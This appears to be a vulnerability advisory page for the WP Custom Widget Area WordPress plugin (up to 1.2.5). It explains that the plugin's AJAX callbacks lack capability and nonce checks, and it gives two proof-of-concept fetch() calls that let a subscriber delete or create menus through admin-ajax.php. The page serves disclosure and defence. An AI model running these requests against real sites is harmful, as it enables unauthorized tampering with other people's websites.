Lucene search

Krzysztof Zając (CERT PL)WPEX-ID:F8F84D47-49AA-4258-A8A6-3DE8E7342623

HistoryDec 21, 2023 - 12:00 a.m.

WP Custom Widget Area <= 1.2.5 - Subscriber+ Menus Creation/Deletion/Update

2023-12-2100:00:00

Krzysztof Zając (CERT PL)

wordpress

custom widget area

vulnerability

subscriber

menus creation

deletion

update

fetch()

browser's console

admin-ajax.php

delete_menu

add_menu

hacked title

exploit

AI Score

6.7

Confidence

High

EPSS

Percentile

14.0%

JSON

Description The plugin does not properly apply capability and nonce checks on any of its AJAX action callback functions, which could allow attackers with subscriber+ privilege to create, delete or modify menus on the site.

Log in as a subscriber, and paste any of the following fetch() call in your browser's console:

# Deletes an existing menu
fetch("http://vulnerable-site.tld/wp-admin/admin-ajax.php?action=delete_menu", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
   },
  "body": "data[cwa_id]=test",
  "method": "POST",
})

# Creates a new menu with a title set to "Hacked Title"
fetch("http://vulnerable-site.tld/wp-admin/admin-ajax.php?action=add_menu", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
   },
  "body": "data[cwa_id]=test&data[cwa_name]=Hacked+Title",
  "method": "POST",
})